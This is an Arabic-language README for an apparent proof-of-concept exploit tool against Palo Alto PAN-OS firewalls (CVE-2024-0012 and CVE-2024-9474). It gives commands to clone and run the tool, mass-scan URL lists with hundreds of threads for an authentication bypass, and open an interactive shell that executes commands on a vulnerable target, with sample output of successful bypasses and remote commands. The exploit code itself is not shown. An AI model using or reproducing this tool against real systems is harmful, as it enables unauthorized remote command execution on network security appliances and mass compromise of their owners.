
ثغرة RCE في Palo Alto
هذا السكربت هو استغلال إثبات المفهوم (PoC) للثغرات الموجودة في Palo Alto PAN-OS (CVE-2024-0012 و CVE-2024-9474). يمكن استخدام السكربت إما لفحص قائمة عناوين URL بحثاً عن الثغرة أو لاستغلال عنوان URL مفرد ضعيف بشكل تفاعلي.
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3: شريط التقدم لعرض حالة الفحص. github.com/gookit/color: دعم محسّن للألوان لمخرجات وحدة التحكم. github.com/manifoldco/promptui: مطالبات تفاعلية لسطر الأوامر. github.com/p0dalirius/goopts/parser: تحليل وسيطات سطر الأوامر.
يُستخدم وضع الفحص للتحقق من عدة عناوين URL بحثاً عن الثغرة. يجب توفير ملف يحتوي على قائمة بعناوين URL.
go run main.go --file urls.txt --output results.txt --threads 100
--file: المسار إلى ملف يحتوي على قائمة عناوين URL لفحصها. --output: المسار لحفظ نتائج الفحص (الافتراضي: output.txt). --threads: عدد الخيوط المتزامنة المستخدمة للفحص (الافتراضي: 200).
http://example1.com
http://example2.com
يتيح لك وضع الاستغلال استغلال عنوان URL ضعيف بشكل تفاعلي.
go run main.go --url http://target.com --output results.txt
--url: عنوان URL الهدف المطلوب استغلاله. --output: المسار لحفظ نتائج الاستغلال. بمجرد الدخول إلى وضع الاستغلال، يمكنك إدخال أوامر لتنفيذها على النظام الهدف. اكتب exit لإنهاء الصدفة التفاعلية.
لعرض معلومات المساعدة:
go run main.go --help
بعد اكتمال الفحص، سيتم حفظ النتائج في ملف الإخراج المحدد (مثل results.txt):
[+] http://example1.com - Auth Bypass successful
[+] http://example2.com - Auth Bypass successful
عند استغلال عنوان URL بشكل تفاعلي، يتم عرض مخرجات الأوامر بعد تنفيذها على الهدف:
# ls /var
bin app lib tmp
# exit
[+] Exiting interactive shell.
وسيطات سطر الأوامر العلم الوصف القيمة الافتراضية --url عنوان URL المطلوب استغلاله في وضع الاستغلال --file ملف يحتوي على عناوين URL لفحصها (يُستخدم في وضع الفحص) --output ملف الإخراج لحفظ النتائج output.txt --threads عدد الخيوط المتزامنة للفحص (وضع الفحص) 200 --help عرض رسالة المساعدة
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.